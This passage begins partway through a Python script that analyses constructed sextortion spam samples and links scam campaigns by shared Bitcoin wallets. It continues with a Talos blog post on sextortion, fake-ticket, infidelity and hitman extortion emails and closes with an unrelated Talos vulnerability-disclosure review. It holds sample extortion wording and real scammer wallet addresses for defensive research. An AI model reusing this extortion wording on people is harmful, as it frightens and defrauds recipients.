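# the real regexes is not reproduced here (assumption, not from the post).
AARON_FROM_RE = re.compile(r"^Aaron\d{3}@", re.IGNORECASE)

# Constructed sample messages. The wallets starting 1HJb... and 1NAX... are the
# two quoted in the post; 1FakeWa11et... is a made-up placeholder.
SAMPLE_MESSAGES = [
    {"campaign": "aaron_smith", "sender": "Aaron417@sender.invalid", "rcpt": "victim1@example.invalid",
     "body": "Your password is hunter2. Send $3,000 to 1FakeWa11etAaronCampaignABCDEFGHJK within 48 hours."},
    {"campaign": "aaron_smith", "sender": "Aaron902@sender.invalid", "rcpt": "victim1@example.invalid",
     "body": "I know your password: hunter2. $3,000 to 1FakeWa11etAaronCampaignABCDEFGHJK or the video goes out."},
    {"campaign": "aaron_smith", "sender": "Aaron115@sender.invalid", "rcpt": "victim2@example.invalid",
     "body": "Your password is qwerty. Send $7,000 to 1FakeWa11etAaronCampaignABCDEFGHJK within 48 hours."},
    {"campaign": "ticket", "sender": "support@sender.invalid", "rcpt": "victim3@example.invalid",
     "body": "Camera Ready, Notification: 2018-10-20. Ticket #4471. Pay $900 to 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy."},
    {"campaign": "ticket", "sender": "support@sender.invalid", "rcpt": "victim4@example.invalid",
     "body": "Camera Ready, Notification: 2018-10-21. Ticket #4472. Pay $900 to 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7."},
    {"campaign": "video_for_bitcoin", "sender": "anna@sender.invalid", "rcpt": "victim5@example.invalid",
     "body": "Deposit $100 to 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy and a custom video will be sent."},
    {"campaign": "infidelity", "sender": "watcher@sender.invalid", "rcpt": "victim6@example.invalid",
     "body": "I followed you and have photos of your affair. Send $1,200 to 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7."},
]


def extract_wallets(body):
    """Return the distinct wallet-looking strings in a message body, in order of appearance."""
    seen = []
    for match in BTC_RE.findall(body):
        if match not in seen:
            seen.append(match)
    return seen


def extract_demand(body):
    """Return the first dollar demand as an int, or None if the body names no amount."""
    match = DEMAND_RE.search(body)
    return int(match.group(1).replace(",", "")) if match else None


def is_aaron_smith(sender):
    """True if the From: address matches the (assumed) 'Aaron Smith' sender pattern."""
    return bool(AARON_FROM_RE.match(sender))


def wallet_campaign_index(messages):
    """Map each wallet to the sorted list of campaigns in which it appeared."""
    index = defaultdict(set)
    for msg in messages:
        for wallet in extract_wallets(msg["body"]):
            index[wallet].add(msg["campaign"])
    return {wallet: sorted(campaigns) for wallet, campaigns in index.items()}


def shared_wallets(messages):
    """Wallets reused across more than one campaign: the pivot that links scams together."""
    return {w: c for w, c in wallet_campaign_index(messages).items() if len(c) > 1}


def summarize(messages):
    """Campaign-level statistics of the kind reported in the post."""
    recipients = {m["rcpt"] for m in messages}
    wallets = {w for m in messages for w in extract_wallets(m["body"])}
    demands = Counter()
    for m in messages:
        demand = extract_demand(m["body"])
        if demand is not None:
            demands[demand] += 1
    return {
        "total": len(messages),
        "unique_recipients": len(recipients),
        "avg_per_recipient": round(len(messages) / len(recipients), 2),
        "unique_wallets": len(wallets),
        "msgs_per_wallet": round(len(messages) / len(wallets), 2),
        "aaron_smith_msgs": sum(is_aaron_smith(m["sender"]) for m in messages),
        "demand_counts": dict(demands),
        "shared_wallets": shared_wallets(messages),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_MESSAGES).items():
        print(f"{key}: {value}")
```

On a real SpamCop-style corpus the same functions run unchanged over parsed `From:`, `To:` and body fields; only the sample list is constructed.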

Attackers' use of personal information
One of the first related sextortion campaigns we discovered utilized the victim's telephone number instead of their data breach password. While a telephone number isn't nearly as private or confidential as a user's password, it is still arguably somewhat personal. By including the victim's telephone number, the attackers were hoping they could convince recipients that their sextortion scam was indeed real.

An example sextortion attack using victims' phone numbers

If you read the text closely, you will notice that much of the text in this email is virtually identical to the text contained in the "Aaron Smith" campaigns Talos analyzed previously, especially the text in the closing paragraph.

As a matter of fact, while searching SpamCop, we encountered a sample email message where the attackers appeared to have mistakenly disclosed their template containing the choose-your-own-adventure-style text variations for generating varied message bodies as part of their sextortion spam attack.

An example of a sextortion template message mistakenly emailed out by the attackers

Internationalized sextortion
Security researchers at IBM X-Force recently discovered a sextortion campaign that was purportedly sent through the Necurs botnet infrastructure in late September 2018. Using the 20 bitcoin wallet indicators of compromise (IoCs) provided by IBM, Talos identified nearly 1,000 different sending IP addresses involved in transmitting both the "Aaron Smith" spam and the international sextortion spam that IBM X-Force associated with the Necurs botnet. The overlap in sending IP infrastructure indicates, with a reasonable degree of confidence, that the same spammers are behind both of these sextortion campaigns.

Besides the "7 different languages (ENG, GER, FRE, ITA, JPN, KOR, ARA)" of sextortion spam identified in the X-Force blog, Talos identified additional variations of a similar sextortion campaign in Czech, Spanish, Norwegian, Swedish and Finnish.

An example of a sextortion message in Spanish

Additional attack variations
There were other, similar forms of sextortion spam originating from some of the same Necurs-sending IP infrastructure. Below is an example of a sextortion spam email that is attempting to look like a support ticket. For extra authenticity, the message even includes text near the top of the body that reads: "Camera Ready, Notification: <date>."

An example of a sextortion email disguised as a "Ticket"

The attackers used that same exact bitcoin wallet in a completely different type of bitcoin-related email scam. The BTC wallet 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy located in the "Ticket" example above, also appears in an explicit video-for-bitcoin scam. In the sex video swindle, the attackers impersonate a young girl from the Russian Federation, and promise to send a custom explicit video in exchange for a deposit of $100 into the attackers' bitcoin wallet.

An example of an explicit video-for-bitcoin message containing a duplicate sextortion bitcoin wallet

Talos identified additional bitcoin wallets that overlapped, which revealed additional attacks, also likely perpetrated by the same group of spammers. For example, the bitcoin wallet 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 not only appears in the "Ticket"-type sextortion scam messages detailed above, but it also appears in a different scheme meant to extort bitcoin from recipients who may be cheating on their significant other. The spammers claim to have been following the victim, where they obtained photographic evidence concerning the recipient's purported infidelity.

An example of an illicit relationship extortion message

Other (unrelated?) attack variations
As we reviewed additional bitcoin-related spam from SpamCop, we came across several other types of social engineering attacks aimed at obtaining bitcoin payments.

In a clever twist on the "I-know-you-are-cheating" extortion example detailed above, attackers claim to have proof that the victim's partner is in fact cheating on them. While the wording of the text in the message feels somewhat familiar, it is dissimilar enough to other extortion attacks (by containing an attached QR code, for example) that it may in fact be the handiwork of a completely different group of attackers.

A variation of the extortion attack offering victims proof of their partner's infidelity

Talos also discovered messages related to a much more frightening and violent variety of extortion. In these messages, the attackers claim to have been paid to kill the recipient of the email. The hitmen claim to already have their transportation arranged, but since they have had a change of heart, they are now willing to sell information about who hired them to their potential victim. Again, the formula and wording of the message sound quite similar to text we witnessed in multiple sextortion emails. Though we suspect it, Talos cannot say for certain that these violent extortion emails are in fact the work of the same attackers.

An example of a violent extortion message threatening to kill the recipient

Other examples of social engineering
We also noticed some bitcoin-related spam campaigns that, while having very little connecting them to the spam sent via the Necurs botnet, represented creative attempts to coerce victims through social engineering.

First, there was an attack targeting victims with a propensity to fall for get-rich-quick schemes. In this offer, recipients are encouraged to send bitcoin to a wallet address where their bitcoin will magically double in value within three hours' time. This bitcoin "doubler" claims to exploit an undisclosed "bug in the system." While the average user may quickly realize this is a scam, some users who are not as educated on the concept of bitcoin may be susceptible to this type of spam.

An example of the bitcoin doubler email

Other bitcoin-related spam targets those who might be inclined to donate to charity. While easing the suffering of children affected by military aggression is a most admirable cause, we couldn't find anything in this message to indicate that this is a legitimate charitable organization.

An example of the questionable "Charitable Children's Fund" email

We also discovered a piece of spam that claims to be "positive junk mail." The body of the message reads, "You know those emails that keep circulating trying to extort you for bitcoin claiming they have compromised the camera in your computer and have embarrassing videos and photos that they plan to share with your friends and family?...This IS NOT one of those!"

An example of the bitcoin lottery spam

In the Q&A section near the bottom of this email the spammers write, "Q: How do we know this is legitimate? A: You don't. We can't actually post proof without exposing ourselves as well as the winner. Take it for what it's worth. We apologize but this is the best we can do."

If you're curious about how the whole Oct. 4 bitcoin lottery drawing turned out, note that there is only one transaction for the bitcoin wallet mentioned in the spam. That transaction happened back on Sept. 28 and was for $4.

Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users' email inboxes, many of them may not be educated enough to identify that it's a scam designed to make them give away their bitcoins. Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.

Indicators of compromise (IOC)
Here is a list of the 58,611 bitcoin wallets used by the attackers in the "Aaron Smith" sextortion spam.

Talos Vulnerability Discovery Year in Review - 2018

Tue, 30/10/2018 - 16:13

Cisco Talos' Vulnerability Discovery Team investigates software and operating system vulnerabilities in order to discover them before malicious threat actors. We provide this information to vendors so that they can create patches and protect their customers as soon as possible. We strive to improve the security of our customers with detection content, which protects them while the vendor is creating, testing, and delivering the patch. These patches ultimately remove the vulnerability in question, which increases security not only for our customers but for everyone. Once these patches become available, the Talos detection content becomes public, as well. You can find all of the release information via the Talos vulnerability information page here.

Over the past several years, our research team has improved the pace at which we disclose vulnerabilities. Talos increased the number of vulnerabilities it disclosed 22 percent year-over-year, and we hope to continue to grow that number. As of Oct. 23, Cisco has updated its vendor vulnerability and discovery policy. You can read the complete details here.

Our coordinated disclosure philosophy involves working closely with vendors to address the vulnerabilities discovered by our team. Our focus is to protect customers and share this data in coordination with the software vendor. Responsible reporting involves working within the policy outlined below, while also ensuring the vendor has an opportunity to resolve the issue in a timely manner.
Timeline of actions to be taken by Cisco

In the interest of fostering coordinated vulnerability disclosure, Cisco will attempt to work with any vendor on reasonable adjustments to the above timeline if progress is being made and the 90-day default timeline is not adequate for creating a patch or other type of mitigation that addresses the vulnerability. Extenuating circumstances may result in adjustments to the disclosures and timelines when reasonably necessary.

Reporting on Talosintelligence.com

The Talos Vulnerability Discovery Team released more than 200 advisories in Cisco's fiscal year 2017, resulting in 202 CVEs. In FY2018 (period ended July 31, 2018), the team increased the discovery total to 251 advisories, which led to nearly 400 CVEs. During FY2018, Talos contributed at least one vulnerability in every Adobe Reader bulletin, 20 vulnerabilities in Foxit PDF Reader, more than 90 advisories for internet-of-things (IoT) devices, eight vulnerabilities in Natus Neuroworks (EEG software), as well as various vulnerabilities in: VMWare, Nvidia Graphics Drivers, OpenOffice, Intel Graphics Drivers, Ethereum applications, and Google PDFium.

FY2018 saw a marked increase in the number of IoT vulnerabilities identified. As IoT devices increase their market share and proliferate, the associated vulnerabilities are increasing while server exploitation continues to decline.

Conclusion

Finding and disclosing zero-day vulnerabilities via coordinated disclosure helps improve the overall security of the devices and software people use on a day-to-day basis. Talos is committed to this effort, developing programmatic ways to identify problems or flaws that could be otherwise exploited by malicious attackers, as well as having dedicated resources working to ensure clear communication and coordination. These developments help secure the platforms and software customers use and also help provide insight into how Talos can improve its own processes.

For vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.